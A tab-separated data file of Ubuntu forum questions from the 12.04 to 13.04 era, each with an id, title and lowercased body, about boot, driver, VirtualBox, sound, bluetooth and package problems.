287184	ubuntu 13.04 can only work in recovery mode	i have just updated my 12.10 to 13.04 . everything is updated . but i can only boot to a black screen . i mean after the grub interface and purple screen . and i can hear the voice of the password interface . but it is only the black screen . it all works ok in 12.10 . but it can work in the recovery mode . i mean go into the recovery mode and choose resume . and then everything is ok . but when loading kernel , the screen is dirty . i do n't know why and i have googled a lot . but no resolutions works . my graphics card is intel gma hd 4000 , tested as vesa : intel速 sandybridge/ivybridge graphics . i have been trapped in this for a whole day . i do need help . hope someone can help me . by the way , the kernel is 3.8.0-19 if it helps .
287187	why is deja backup / duplicity so fast ?	i compared deja backup/duplicity to time machine on similar hardware and deja/duplicity is at least an order of magnitude faster . on same hardware an 100 mb incremental backup on time machine required the same time as 14 gb full backup in duplicity . incremental backups in duplicity are lightning fast . how does duplicity recognize changed files so fast in order to perform incremental backups ?
287188	akonadi server does n't start after kubuntu upgrade to 13.04	from .xsession-errors : processcontrol : application 'akonadiserver ' returned with exit code 255 ( unknown error ) search paths : ( `` /usr/lib/x86_64-linux-gnu/qt4/bin '' , `` /usr/lib/lightdm/lightdm '' , `` /usr/local/sbin '' , `` /usr/local/bin '' , `` /usr/sbin '' , `` /usr/bin '' , `` /sbin '' , `` /bin '' , `` /usr/games '' , `` /usr/local/games '' , `` /usr/sbin '' , `` /usr/local/sbin '' , `` /usr/local/libexec '' , `` /usr/libexec '' , `` /opt/mysql/libexec '' , `` /opt/local/lib/mysql5/bin '' , `` /opt/mysql/sbin '' ) qsqldatabaseprivate : :removedatabase : connection 'initconnection ' is still in use , all queries will cease to work . database error : can not open database . last driver error : `` qmysql : unable to connect '' last database error : `` ca n't connect to local mysql server through socket '/home/deric/.local/share/akonadi/socket-d630/mysql.socket ' ( 2 ) '' qsqlquery : :exec : database not open unable to open database `` ca n't connect to local mysql server through socket '/home/deric/.local/share/akonadi/socket-d630/mysql.socket ' ( 2 ) qmysql : unable to connect '' '' [ 0 : akonadiserver ( ) [ 0x418114 ] 1 : akonadiserver ( ) [ 0x418541 ] 2 : /lib/x86_64-linux-gnu/libc.so.6 ( +0x370b0 ) [ 0x7fd2b409c0b0 ] 3 : /lib/x86_64-linux-gnu/libc.so.6 ( gsignal+0x37 ) [ 0x7fd2b409c037 ] 4 : /lib/x86_64-linux-gnu/libc.so.6 ( abort+0x148 ) [ 0x7fd2b409f698 ] 5 : /usr/lib/x86_64-linux-gnu/libqtcore.so.4 ( _z17qt_message_output9qtmsgtypepkc+0x122 ) [ 0x7fd2b5b4f5c2 ] 6 : akonadiserver ( ) [ 0x41a3eb ] 7 : /usr/lib/x86_64-linux-gnu/libqtcore.so.4 ( _zn9qiodevice5writeepkcx+0xb4 ) [ 0x7fd2b5be99f4 ] 8 : /usr/lib/x86_64-linux-gnu/libqtcore.so.4 ( +0x11662f ) [ 0x7fd2b5bf462f ] 9 : /usr/lib/x86_64-linux-gnu/libqtcore.so.4 ( _zn11qtextstreamd1ev+0x3b ) [ 0x7fd2b5bfcbcb ] 10 : akonadiserver ( ) [ 0x41d2cd ] 11 : akonadiserver ( ) [ 0x41e487 ] 12 : akonadiserver ( ) [ 0x411f43 ] 13 : /lib/x86_64-linux-gnu/libc.so.6 ( __libc_start_main+0xf5 ) [ 0x7fd2b4086ea5 ] 14 : akonadiserver ( ) [ 0x4128d1 ] ]
287189	how to force nautilus to open with side panel	new nautilus 3.8 does n't open with side panel . even if i turn it on ( f9 key ) , then close the window and reopen it - panel disappears . can i force nautilus to start with panel ? ticking proper option in gconf-editor does n't help , cause it concerns gtk 2 .
287191	why is my screen flickering while watching some flash videos ?	i 'm having an issue where on many flash videos ( amctv 's sites videos allow me to reproduce this consistantly ) flicker . the bottom half of my laptop or vga monitor 's screen will flash white or turn black , then the same with the top . this makes renders videos from certain sites unwatchable .
287193	how can i hide files in nautilus permanently ?	how can i hide files in nautilus permanently ? when i uncheck the `` show hidden files '' button , the files get hidden . but when i open nautilus the next time they are always back , which is quite annoying and makes nautilus unusable .
287200	upgrade to 13.04 dialog still offering development release ( alpha ) , not stable one	i ran sudo apt-get update & & sudo apt-get dist-upgrade then sudo update-manager -d. but the upgrade dioalog propose the 13.04 development version , not the stable one ... see below : how to upgrade to the official stable 13.04 release ? thanks .
287202	installing fresh ubuntu 13.04 instead of ubuntu 12.10	i 'm using ubuntu 12.10 and i 'm going to install ubuntu 13.04 tomorrow night . in iran internet speed is n't very good to upgrade from ubuntu 12.10 to 13.04 . my partition scheme is / , swap and /home . is it necessary to format the /home partiton ? what about the / partition ?
287204	guake terminal has space left at the top	when starting the guake terminal in 13.04 , there is a space of 1-2 cms left at the top . i.e the guake terminal top border is 1-2 cms below the screen top edge . how can i fix this as it was working perfectly in 12.10 . per the selected answer , its now moved to the top okay , but does anyone have any ideas on the two minor lines at the sides ? ( : ) it keeps bothering me )
287205	building the main guest additions module ... fail !	my host os is windows 7 professional . i have installed ubuntu 13.04 inside virualbox - 4.2.6 . when i tried to install guest additions for ubuntu i got error in the terminal as below : ranjeet @ ringtail : /media/ranjeet/vboxadditions_4.2.6_82870 $ sudo sh vboxlinuxadditions.run [ sudo ] password for ranjeet : verifying archive integrity ... all good . uncompressing virtualbox 4.2.6 guest additions for linux ... ... ... . virtualbox guest additions installer removing installed version 4.2.6 of virtualbox guest additions ... removing existing virtualbox dkms kernel modules ... done . removing existing virtualbox non-dkms kernel modules ... done . building the virtualbox guest additions kernel modules the headers for the current running kernel were not found . if the following module compilation fails then this could be the reason . building the main guest additions module ... fail ! ( look at /var/log/vboxadd-install.log to find out what went wrong ) doing non-kernel setup of the guest additions ... done . installing the window system drivers installing x.org server 1.13 modules ... done . setting up the window system to use the guest additions ... done . you may need to restart the hal service and the window system ( or just restart the guest system ) to enable the guest additions . installing graphics libraries and desktop services components ... done . ranjeet @ ringtail : /media/ranjeet/vboxadditions_4.2.6_82870 $ the logs are as below . -- -- -- -- -- -vboxadd-install.log -- -- -- -- -- -- -- -- -- - uninstalling modules from dkms attempting to install using dkms creating symlink /var/lib/dkms/vboxguest/4.2.6/source - > /usr/src/vboxguest-4.2.6 dkms : add completed . kernel preparation unnecessary for this kernel . skipping ... building module : cleaning build area ... . make kernelrelease=3.8.0-19-generic -c /lib/modules/3.8.0-19-generic/build m=/var/lib/dkms/vboxguest/4.2.6/build ... . ( bad exit status : 2 ) traceback ( most recent call last ) : file `` /usr/share/apport/package-hooks/dkms_packages.py '' , line 22 , in < module > import apport importerror : no module named apport error ! bad return status for module build on kernel : 3.8.0-19-generic ( x86_64 ) consult /var/lib/dkms/vboxguest/4.2.6/build/make.log for more information . failed to install using dkms , attempting to install without grep : /lib/modules/3.8.0-19-generic/build/include/linux/version.h : no such file or directory make kbuild_verbose=1 config_module_sig= -c /lib/modules/3.8.0-19-generic/build subdirs=/tmp/vbox.0 srcroot=/tmp/vbox.0 modules test -e include/generated/autoconf.h -a -e include/config/auto.conf || ( \ echo > & 2 ; \ echo > & 2 `` error : kernel configuration is invalid . `` ; \ echo > & 2 `` include/generated/autoconf.h or include/config/auto.conf are missing . `` ; \ echo > & 2 `` run 'make oldconfig & & make prepare ' on kernel src to fix it . `` ; \ echo > & 2 ; \ /bin/false ) mkdir -p /tmp/vbox.0/.tmp_versions ; rm -f /tmp/vbox.0/.tmp_versions/* make -f scripts/makefile.build obj=/tmp/vbox.0 gcc -wp , -md , /tmp/vbox.0/.vboxguest-linux.o.d -nostdinc -isystem /usr/lib/gcc/x86_64-linux-gnu/4.7/include -i/usr/src/linux-headers-3.8.0-19-generic/arch/x86/include -iarch/x86/include/generated -iinclude -i/usr/src/linux-headers-3.8.0-19-generic/arch/x86/include/uapi -iarch/x86/include/generated/uapi -i/usr/src/linux-headers-3.8.0-19-generic/include/uapi -iinclude/generated/uapi -include /usr/src/linux-headers-3.8.0-19-generic/include/linux/kconfig.h -iubuntu/include -d__kernel__ -wall -wundef -wstrict-prototypes -wno-trigraphs -fno-strict-aliasing -fno-common -werror-implicit-function-declaration -wno-format-security -fno-delete-null-pointer-checks -o2 -m64 -mno-sse -mpreferred-stack-boundary=3 -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -maccumulate-outgoing-args -fstack-protector -dconfig_x86_x32_abi -dconfig_as_cfi=1 -dconfig_as_cfi_signal_frame=1 -dconfig_as_cfi_sections=1 -dconfig_as_fxsaveq=1 -dconfig_as_avx=1 -dconfig_as_avx2=1 -pipe -wno-sign-compare -fno-asynchronous-unwind-tables -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -wframe-larger-than=1024 -wno-unused-but-set-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -pg -mfentry -dcc_using_fentry -wdeclaration-after-statement -wno-pointer-sign -fno-strict-overflow -fconserve-stack -dcc_have_asm_goto -include /tmp/vbox.0/include/vbox/vboxguestmangling.h -i/lib/modules/3.8.0-19-generic/build/include -i/tmp/vbox.0/ -i/tmp/vbox.0/include -i/tmp/vbox.0/r0drv/linux -i/tmp/vbox.0/vboxguest/ -i/tmp/vbox.0/vboxguest/include -i/tmp/vbox.0/vboxguest/r0drv/linux -d__kernel__ -dmodule -dvbox -drt_os_linux -din_ring0 -din_rt_r0 -din_guest -din_guest_r0 -din_module -drt_with_vbox -dvbgl_vboxguest -dvbox_with_hgcm -drt_arch_amd64 -dvbox_with_64_bits_guests -dmodule -d '' kbuild_str ( s ) = # s '' -d '' kbuild_basename=kbuild_str ( vboxguest_linux ) '' -d '' kbuild_modname=kbuild_str ( vboxguest ) '' -c -o /tmp/vbox.0/.tmp_vboxguest-linux.o /tmp/vbox.0/vboxguest-linux.c /tmp/vbox.0/vboxguest-linux.c:199:49 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘g_vboxguestpciid’ /tmp/vbox.0/vboxguest-linux.c:328:21 : error : ‘g_vboxguestpciid’ undeclared here ( not in a function ) /tmp/vbox.0/vboxguest-linux.c:209:1 : error : ‘__mod_pci_device_table’ aliased to undefined symbol ‘g_vboxguestpciid’ make [ 2 ] : *** [ /tmp/vbox.0/vboxguest-linux.o ] error 1 make [ 1 ] : *** [ _module_/tmp/vbox.0 ] error 2 make : *** [ vboxguest ] error 2 creating user for the guest additions . creating udev rule for the guest additions kernel module .
287206	ubuntu 13.04 wo n't boot after grub	i ran into a problem with ubuntu 13.04 . i installed it without any problems . when i reboot my machine it hangs on a black screen with a blinking cursor after grub . i tried recovery mode as well and it hangs at switching to clock source tsc . i tried the nomodeset parameter for the kernel , but it results in the same . i used a dualboot ubuntu 12.04 & windows 7 before , now i only want ubuntu 13.04 alone . can someone help me with that ?
287209	trouble downloading software from software center	after installng 12.04 lts version through wubi , i am unable to install softwares from software center.it shows the message to check internet connection , but i am able to load pages from mozila.i tried to change software source from main server to my country but it is not showning any server from my country , help please
287210	windows 7 , ubuntu 12.04 dual boot hard drive issues	i have recently bought a new laptop , and as i use ubuntu on my desktop , but want to play games on my laptop , i installed both windows 7 and ubuntu 12.04 on the laptop . it all went pretty well , i can boot both without any problems , but i noticed something strange . i divided the 1 tb hard drive into partitions the following way : 10 gbs for the ubuntu itself , 8 gb for home , 8 gb for swap , and 25 gb for the windows partition . i partitioned the rest as one fat32 partition-using ubuntu 's disk utility , which said it is around 930 gbs . however , when i boot into windows , it sees it alright , though it sees it as a 875 gbs partition . my concern is not about the space loss , i just do n't know what causes the difference , and i do n't know if it 'll cause any problems in the future .
287212	ubuntu 12.04 remove email icon	i use gnome classic desktop environment on my netbook . how can i remove the email icon ( or the whole messenger ) ? although i can delete all the icons from the panel , i only want to delete just this one icon .
287215	worth installing ubuntu on 15 '' powerbook g4 ?	i trying to figure out whether or not if i should install ubuntu on my 15 '' powerbook g4 1.25 ghz and i pretty sure the ram is maxed out at 2 gb and also its currently running mac osx leopard 10.5.8 which so far for me i 've had no problems with but i 'm thinking i 'll install ubuntu anyways . so is it a good idea to install it and which version should i install ? thanks in advanced -reiss
287216	virtualbox shared folder is accessible but not workable	on my host system ( windows 8 pro 64 bit ) , i installed virtualbox ( 4.2.12 ) and installed ubuntu 12.04 32 bit as guest system . i also installed the virtualbox guest utilities to create shared folders . now , after creating a shared folder , i added my user id to the group vboxsf , which is the owner of the shared folder with sudo usermod -a -g vboxsf < my-user-id > after a re-login to the ubuntu system , i can access the shared folder and create a text file in it . but when using a text editor like gedit or geany , i encounter a strange problem . when i try to save the file , the original file will be removed from the disk and gedit tells me could not save the file /media/sf_shared_folder/test.txt and unexpected error : error renaming temporary file : text file busy why there are conflicts when i am already in the group ? and how to solve them ?
287222	reliable bootable usb creator in ubuntu	i need a reliable application which will make usb pen drives bootable . recently , i tried creating a bootable lubuntu-13-04-alternate usb on a ubuntu 12.10 system but ended up with 'boot error ' when trying to boot . i tried startup disk creator as well as unetbootin . this is not the first time i am experiencing this , rather the above two utilities have always had high failure rates in my experience . universal-usb-installer , yumi , lili have worked great whenever i tried them , but all of them are windows only ! so i have two questions : what is the method to reliably create a bootable usb in ubuntu ? why does windows have some of the best bootable usb creators while linux dosent ?
287223	nvidia geforce drivers break unity in ubuntu 13.04	i 've just installed a fresh copy of ubuntu 13.04 , and tried installing the nvidia drivers for my geforce gt540m . this just completely broke my unity . after rebooting i can login , but it just shows my desktop without the launcher and top panel . also the resolution was 640x480 ( instead of 1920x1080 ) and i was not able to change it via command line ( no modes found , etc. ) . i 've tried a lot of solutions already : using the mainline kernel instead of the default one using ccsm to re-enable unity plugin , problem here was that it did n't show unity removing compiz config files starting unity in 2d mode , but i was n't able to do this because i could not find the option on the login screen delete .xauthority in the home folder remove and install unity again the problem is none of these possible solutions work . i 've seen others with the same problem and these solutions worked for some of them , but it does n't for me . edit : in the meantime iâve found an even better solution than using primus . since one of the later driver versions , optimus is support ( although just basic ) by the package nvidia-prime which is part of the proprietary drivers . install the drivers like so : sudo apt-get install nvidia-331 nvidia-settings-331 nvidia-prime afterwards restart your computer . now the driver will only be enabled when needed , just like it does on windows .
287229	grub rescue after removing ubuntu ?	i dual booted ubuntu 12.04 lts with windows 8 , but i wanted to get rid of ubuntu . so i got easybcd ( on windows 8 ) and removed ubuntu following a tutorial on youtube , then i got rid of the ubuntu partitions . after restarting my sony vaio , it went to grub rescue and i 'm not sure what to do . help please ! much appreciated ! ! i installed ubuntu using a usb .
287230	continuous hard drive access noise	i have an asus x201e netbook ( with 2 gb of ram ) and ubuntu 12.10 . the hard drive can almost always be heard being accessed , even when doing nothing . it is as if a search had been run on the entire drive , but this never stops . this is not `` swapping '' because the `` free '' command reports 900 mb of unused ram and 0 mb of swap space used . i am afraid that this is going to kill the hd prematurely . any ideas where this could come from ?
287233	can i share workspace in eclipse in dualbooting system ?	i am dualbooting windows 8 and ubuntu ( each os has it 's own partition , third partition is shared ) . can i use a same workspace for windows and ubuntu version of eclipse ? i am not doing any serious development , i 'm just learning java atm , so it is not problem for me if some files get corrupted . thank you in advance .
287235	realtek alc888 sound card does n't work after ubuntu 13.04	yesterday i updated my ubuntu system from 12.10 to 13.04 but since then my audio card does n't work at all . with the previous ubuntu version it worked fine . the sound card is recognized by the system ( sudo aplay -l ) but the sound list in system settings - sound - output etc.. is empty . tried also to install realtek linux driver from http : //www.realtek.com.tw/downloads/downloadsview.aspx ? langid=1 & pnid=14 & pfid=24 & level=4 & conn=3 & downtypeid=3 & getdown=false but with no result . please help ! ! ! : )
287237	failed to download repository information - remastersys - 404 not found	i am a 12.04 user and was trying to update my ubuntu using update manager . but an error message of `` failed to download repository information '' appeared . w : failed to fetch http : //www.remastersys.com/ubuntu/dists/precise/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . using the 'search ' feature and google , i found three solutions for problem similar with mine which are : ( 1 ) i changed the download source to the main server ; ( 2 ) i tried to restart my internet connection ; ( 3 ) i use 'apt-get autoclean ' ; ( 4 ) i deleted all files in var/lib/apt/lists . and none of above worked with me . actually i have experienced similar problem with different application before , but solution ( 3 ) & ( 4 ) made the download runs smoothly again , but not this time . so , can anyone shed some light about this , please ? thanks .
287242	error in make : /usr/bin/ld : can not find -lgl	i have a problem in makeing gpgpu-sim package in my ubuntu . this is a ubuntu error and i do not know how to solve it in the make file i have this g++ -shared -wl , -soname , libcudart.so \ build/3010/release/libcuda/*.o \ build/3010/release/cuda-sim/*.o \ build/3010/release/cuda-sim/decuda_pred_table/*.o \ build/3010/release/gpgpu-sim/*.o \ build/3010/release/intersim/*.o \ build/3010/release/*.o -lm -lz -lgl -pthread \ /home/alireza/gpgpu-sim/v3.x/src/gpuwattch//obj_opt/*.o \ -o lib/3010/release/libcudart.so but i get the following error /usr/bin/ld : can not find -lgl collect2 : ld returned 1 exit status make : *** [ lib/3010/release/libcudart.so ] error 1 do you know how to solve this ? thanks
287245	'enable wireless ' not showing in ubuntu 12.10	i have gone through other posts to solve the problem , but it seems bit difficult to fix it . i have ubuntu 12.10 on hp notebook . i do n't see 'enable wireless ' option on the control panel . could someone guide me through this . thanks
287249	what happens if a hdd of my raid1 setup fails ?	i have the following setup : filesystem size used avail use % mounted on /dev/sda1 37g 1.1g 34g 4 % / udev 1.6g 4.0k 1.6g 1 % /dev tmpfs 651m 348k 651m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 1.6g 0 1.6g 0 % /run/shm /dev/md0 294g 191m 279g 1 % /home /dev/md0 are two hdds set as ( software ) raid1 . what happens if one of these two hdds fails ? would /dev/md0 still be accessible and working ? if so , how do i know if one raid1 device fails ?
287251	creating an infrastructure hotspot using ubuntu 12.10	i want to create an infrastructure hot-spot using ubuntu 12.10 as i want use internet on my android phone by creating an infrastructure hot-spot.i have tried to change the setting the hot-spot and make it infrastructure but it did not help and my android could not discover the hot-spot ... ... ... any help would be appreciated ... ... ... .
287253	reduced performance in bumblebee after 3.0 to 3.2 update	i had installed bumblebee 3.0 for my nvidia geforce 635m card in ubuntu 12.10 and got instant results - temp ad fan speeds reduced , batt backup extended to almost 6 hrs . ( from 1.5-2 hrs earlier ) and upon comparing glxspheres with and without optirun , got the fps to jump from ~60 to ~130 . but when bumblebee updated to version 3.2 , i suppose it updated fine and was active , but the batt life reduced to about 4 hrs . also optirun glxspheres gave an fps of ~60 , although it did recognize the nvidia card and mentioned it in the output . is this a bug or some limitation on 3.2 ? should i revert to using 3.0 ? , and if so , how to fix it . please help as i loved the long batt backup and higher fps earlier . also , i saw in some post on the internet that someone got an fps in the range of 1300 - 1600 fps after starting nvidia hardware acceleration whereas i had got only 130 fps ... whats the catch there ?
287254	ubuntu 13.04 bluetooth a2dp does not work	i have installed ubuntu 13.04 in a new partition and i have some issues with bluetooth . i usually use bluetooth to connect to my wireless headset , in the old partition with ubuntu 12.10 everything is okay . ubuntu is able to detect my bluetooth receivers but i ca n't pair my device . after googling i found that all i need is to add enable=socket in the general section of /etc/bluetooth/audio.conf . after restarting the bluetooth daemon i am able to pair my wireless a2dp receiver and i see the bluetooth adapter under the audio setting , that means that pulseaudio has recognized my a2dp adapter . unfortunately when i play the audio file , i hear the output through the pc speakers rather that my bluetooth handcuffs . any idea how to resolve this ? i tried formatting and reinstalling ubuntu 64-bit from scratch in order to get a clean install but the problem is still there . i suspect the ubuntu team has changed something in the bluetooth settings from 12.10 to 13.04 .
287255	how do i move the window buttons of google chrome to left ?	i updated ubuntu 12.10 to 13.04 using gnome shell 3.6 . after the update , the window buttons from e.g . google chrome are displayed on the right side ( close , minimize , maximize ) . in 12.10 , i believe i managed to placed them on the left side with : gconftool-2 -- set /apps/metacity/general/button_layout -- type string `` : minimize , maximize , close '' but the whole metacity branch is missing . how can i achieve the same effect in 13.04 ? i do n't want to use the system title bar and borders .
287257	high fan speed and noise after system wakeup in newly install 13.04	i 've just installed ubuntu 13.04 on my notebook compaq 6720s and found the cpu fun working at high speed after waking system up . when the system is booted the fan works normaly and realy calm . but after sleep and waking up fan is really noisy . i had n't this problem with ubuntu 12.10 . any help appreciated .
287267	install driver ati radeon 6230	i had installed ubuntu 12.10 , but wanted to try 12.04 , then after the installation finished i not had unity 3d ... so i remembered that when i ran 12.10 , in additional drivers had something like `` driver xorg '' or something , but it not was experimental and was `` activated '' and `` currently in use '' , for that was unity 3d , but 12.04 do n't have no one driver enabled by default and the three than are i can activate , but ca n't put in `` currently in use '' , also there is one driver called `` xorg '' , but is experimental , and neither works , and all drivers are proprietary , but the driver by default of ubuntu 12.10 was free ( xorg no experimental ) my question is how can i install that xorg driver of ubuntu 12.10 ( than is not experimental and is free ) in my ubuntu 12.04 ? my graphic card is ati radeon 6320 sorry , my english is very bad , i am using google translator for write this question .
287270	how to change gtk3 color scheme on ubuntu 13.04	i am making the transition from windows 7 to ubuntu 13.04 . i have run ubuntu twice on my laptop before , and switched back to windows 7 . mostly because the orange and gray colors of ubuntu is just ugly . i know how to change ambiance to radiance , but the gtk colors themselves should be customizable . i managed to do it once with 12.04 using kde 's color manager , but the thing wigged out on me . is there a way to change 13.04 's color scheme without downloading some theme that may or may not work ?
287272	ubuntu 's mir , and gnome-shell 's on wayland = ubuntu problems since 13.10 ?	if ubuntu is going to use mir with ubuntu 13.10 , and gnome is going to use wayland with gnome shell 3.10 , will there be any problems to have gnome-shell up to date in ubuntu 13.10 ? because some dependencies are going to be installed when i will install gnome shell right ? or is that what the ubuntu gnome flavor was made for ? to avoid that problem ? but what about people who would like to have unity and gnome shell desktop environments ?
287273	xubuntu 13.04 ca n't delete icons from desktop	today i installed xubuntu session in ubuntu 13.04 , but i noticed i ca n't delete any icons from desktop , when i try to delete one of them i get this error ( translated from my language ) : this feature requires the presence service file manager ( as provided by thunar ) . how to solve this ?
287274	background lag in ubuntu 13.04	i have some lag when i turn off icons from desktop . when i logging i have no wallpaper on background . instead of wallpaper i have freezed logging screen . and the unity ( or maybe compiz ) freezes for a while time . when i turn on icons on desktop all become normal . https : //pbs.twimg.com/media/biuerp5cyaejihh.png
287282	upgrade killed my access to brother scanner . no gscan2pdf , xsane etc . ( brother mfc-8480dn ) here is how i fixed it	first , i went to the brother site and downloaded the driver and key . welcome.solutions.brother.com i installed the driver and key by clicking on them and installing via the ubuntu software center . the center informed me that the files were of poor quality . i informed the center to proceed as directed and not give me any backtalk . second , i added the scanner to libsane.rules using the terminal to get root access to the editor : sudo gedit '/lib/udev/rules.d/40-libsane.rules' then i inserted language before the following line in that file : '' # the following rule will disable usb autosuspend for the device '' here is the language to add : # brother scanners attrs { idvendor } == '' 04f9 '' , env { libsane_matched } = '' yes '' third , i saved the file , closed the editor , closed the terminal , rebooted . how to fix this ?
287284	suspend stopped working	i have an asus x201e netbook with ubuntu 12.10 . a few weeks ago , suspend stopped working , either when closing the lid or when calling it manually . it just locks the display , and that 's it . i managed to make `` suspend '' work again sometimes by adding grub_cmdline_linux= '' acpi_sleep=nonvs '' to /etc/default/grub.conf , but it works only once in a session - the next time this is tried , it fails like before . this used to work perfectly when i installed the os in february 2013 .
287289	mouse speed settings not present in ubuntu 13.04	when i have a wireless mouse attached , the pointer speed setting for the mouse is missing for wireless mouse in ubuntu 13.04 . please guide
287290	change ubuntu to windows	i am using ubuntu 13.04 . and now i want to use windows as ubuntu have lots of fail and my laptop is all time is overheated . i mean by overheated that you ca n't touch fan postion because it 's so hot . now i want to use windows , but i wonder is there a way to install windows and remove ubuntu without formate my hard drive and songs , music , documents stay in drive so i do n't need to formate all hard to make it ntfs again .
287291	how do i get the brightness control working on an hp 6735s ?	i ca n't change the brightness on my screen via hotkeys or any other method . i 'm stuck with low brightness which is very hard on my eyes during long periods in front of my laptop . is there any working solution out there ?
287301	is it possible to use the backspace key in files 3.6 to return to the previous directory like in nautilus ?	if there is something that i 'm really addicted is in pushing the backspace key every time i want to return to the previous directory in the old file manager ( nautilus ) , but now with files i ca n't do it . so i 'd like to know how to do it on files , or if there is any plugin that fits my purpose ?
287302	create image from older to newer	i have an older hp-540 laptop and bought a new dell-inspiration-14r . now i want to create a complete image of my older into the new one.is this possible ? if possible than how ? i have ubuntu 12.04 in older and windows 8 in new laptop . i have an ethernet cable also .
287304	ubuntu not booting after upgrade failed [ from quantal to raring ]	i am having a big time getting my laptop to boot again . i have launch the upgrade process yesterday before going to sleep and today upon waking up , i saw that the upgrade somehow failed to complete successfully and some package could not be updated . i was upgrading from quantal to raring . the laptop stopped responding and i had to restart it . however , from now on , it will not boot . upon booting , i am getting the following message : general error mounting filesystems . control d will terminate the shell and reboot this system root @ xyzkj-k52f : as i am new to linux , i am stuck right here and have no clue what i should be doing . therefore i searched around the forum here as i always did in the past and i found some suggestions . trying to use the livecd one suggestion was to use the livecd to boot the system and after it boots , there are direction to solve the problem . i tried using the livecd but strangely , the livecd will not even load and fails . i get the menu screen to choose 'start/install ubuntu ' and when i chose that ... it will start loading and will freeze when it is 'mounting filesystem ' and after a while will land on the busybox console . and from there , i am stuck . no idea how to proceed since the livecd will not load . using boot repair disk the other suggestion was to use the boot repair disk and it will correct the errors with the broken packages and grub . i downloaded it and burned it on a cd . i then loaded it on my laptop . i was able to successfully boot the boot rapair disk and i chose the 'recommended repair ' . the repair tool started and did some stuffs and afterwards a dialog message showed up saying 'boot successfully repaired ' and asked me to reboot the machine . i was quite delighted but upon rebooting , i ended up with the same problem . it looks like nothing was fixed . the boot rapair disk gave me this url http : //paste2.org/dmh7ng8b where it has saved some report apparently . information regarding my disk i have a single hardisk with 320gb . it has been partitioned in 3 parts . 1st is ext4 where the ubuntu files are stored , 2nd is the swap partition and 3rd is the logical partition where i store my stuffs . i do not have a dual booting system and use only ubuntu . so , currently i am a bit desperate as i need to get some work done but i am unable to use my machine . however , i do know that there are very helpful souls here and as i have found many solutions to my problems in the past from here , i expect this problem will not be leaving for long now that i have placed it here . if more information is needed , i will gladly add it . thanking you in advance ...
287305	problem installing ubuntu-sdk	while installing sdk this error appears : ubuntu-sdk : depends : qt5-default but it is not going to be installed recommends : libqt5webkit5-qmlwebkitplugin but it is not going to be installed recommends : qtdeclarative5-particles-plugin but it is not going to be installed recommends : qtdeclarative5-qtaudioengine-plugin but it is not going to be installed e : unable to correct problems , you have held broken packages .
287306	ubuntu server manager installation fails on 13.04 - why	installation of server manager utility on 13.04 fails . have tried many combination of loading packages to fix . dependency problems prevent configuration of ubuntu-server . denpendency on on gir1.2-launchpad-integration-3.0 is not installed ( but i installed it ) process fails when processing triggers for gnome-menus . fails on both gnome and kde desktops . any ideas out there ?
287308	k3b - cdrecord has no permission	i use ubuntu 12.04 . today i tried to burn an iso file in a dvd-r disk using k3b . it used to work , but today , after one and a half minutes , it stopped saying that `` cdrecord has no permission to open the device '' . i searched for a solution , and i found that i had to do something with k3bsetup . i tried to use it , but i had no idea what to do , and i could n't find a guide , so i checked cdrecord and clicked apply . now there is another error ; it says `` cdrecord returns an unknown error ! ( code 254 ) '' . what should i do ?
287314	trying to monitor an nfs mount with conky results in an `` statfs '/nfs/pi ' : no such file or directory '' error	i 've been google'ing this for a while and ca n't find any help . i have a nfs-server at home that is mounted to our laptops with autofs via wifi . i monitor my laptop with conky 1.8.1 and i want to conky to show info about my nfs-fileshare only when it is mounted , i.e only when i 'm home . i have tried using : if_mounted /nfs/pi and if_existing /nfs/pi but i get this error : conky : statfs '/nfs/pi ' : no such file or directory i have therefor tried a different approach creating a script that pings to my server and if it not found it returns 0 , so the checks for my nfs-mount should only be run if the server is available , but it does n't work either . i get again the same error : conky : statfs '/nfs/pi ' : no such file or directory here is the relevant part of my .conkyrc $ { font sans-serif : bold : size=10 } file system $ { hr 2 } $ { font sans-serif : normal : size=10 } / $ alignr $ { fs_used / } / $ { fs_size / } $ { fs_bar / } /home $ alignr $ { fs_used /home } / $ { fs_size /home } $ { fs_bar /home } $ { if_existing /sys/class/net/eth2/operstate up } $ { if_match `` $ { exec ~/.pingtest.sh } '' == '' 1 '' } /nfs $ alignr $ { fs_used /nfs/pi } / $ { fs_size /nfs/pi } $ { fs_bar /nfs/pi } $ endif $ endif if someone has an idea of why it happens or another approach to the problem , i will really appreciate any help !
287317	if i install lubuntu on ubuntu , is it really lubuntu ?	i have ubuntu as a vm , and i just installed lubuntu sudo apt-get install lubuntu-desktop and now i can boot into this desktop enviroment . but , my question is ... is this really lubuntu ? should i just download and install lubuntu ? i want the lightest version possible .
287322	can i update a burned disk content from 12.04 to a newer version like 13.04 ?	i have burned a disk image of ubuntu 12.04 and i would like to know if i could update the content . maybe it 's a stupid question !
287336	after ubuntu 13.04 update all drivers crashed	after updating ubuntu all menus and dock on desktop disappeared . video drivers and internet crashed . apt-get upgrade does n't work because i have no connection . what should i do ?
287338	kubuntu 13.04 installer crashes on manual partition setup	i love kubuntu , but the day i get to install a new version without issue is the day i dance naked through the streets : - ( trying to install 13.04 on my dell xps . the installer starts up fine , but when i get to hard disk setup i get a problem : the installer crashes . i have two hard disks with 12 partitions in total . when i select manual setup , i can configure the first 5 partitions without problem , but when i get to the sixt partition on the 1st hard disk , the installer crashes with the following error : installer crashed /usr/lib/ubiquity/ubiquity/frontend/kde_components/partitionmodel.py '' , line 111 , in parent parentitem = childitem.parent ( ) attributeerror : 'partition ' object has no attribute 'parent' i 've even tried not configuring the 6th partition on disk 1 and moving to disk 2 instead . when i try to configure a partition there , the installer crashes as well , but without an error ( just a black screen ) any suggestions ?
